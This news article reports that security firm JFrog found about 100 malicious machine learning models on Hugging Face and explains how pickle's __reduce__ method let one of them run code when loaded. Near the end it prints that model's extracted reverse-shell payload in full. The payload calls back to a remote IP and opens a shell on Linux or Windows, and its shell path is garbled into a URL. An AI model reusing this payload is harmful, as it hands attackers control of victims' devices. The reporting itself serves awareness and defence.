Photograph depicts a security scanner extracting virus from a string of binary code. Hand with the word

Getty Images

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

A lab machine set up as a honeypot to observe what happened when the model was loaded.

JFrog

Secrets and other bait data the honeypot used to attract the threat actor.

Enlarge / Secrets and other bait data the honeypot used to attract the threat actor.

JFrog

How baller432 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickles is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that it can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity of sneaking malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"  RPORT = 4242    from sys import platform    if platform != 'win32':      import threading      import socket      import pty      import os        def connect_and_spawn_shell():          s = socket.socket()          s.connect((RHOST, RPORT))          [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]          pty.spawn("https://arstechnica.com/bin/sh")        threading.Thread(target=connect_and_spawn_shell).start()  else:      import os      import socket      import subprocess      import threading      import sys        def send_to_process(s, p):          while True:              p.stdin.write(s.recv(1024).decode())              p.stdin.flush()        def receive_from_process(s, p):          while True:              s.send(p.stdout.read(1).encode())        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        while True:          try:              s.connect((RHOST, RPORT))              break          except:              pass        p = subprocess.Popen(["powershell.exe"],                            stdout=subprocess.PIPE,                           stderr=subprocess.STDOUT,                           stdin=subprocess.PIPE,                           shell=True,                           text=True)        threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()      threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()      p.wait()

Hugging Face has since removed the model and the others flagged by JFrog.

Hugging Face, the GitHub of AI, hosted code that backdoored user devices Read More »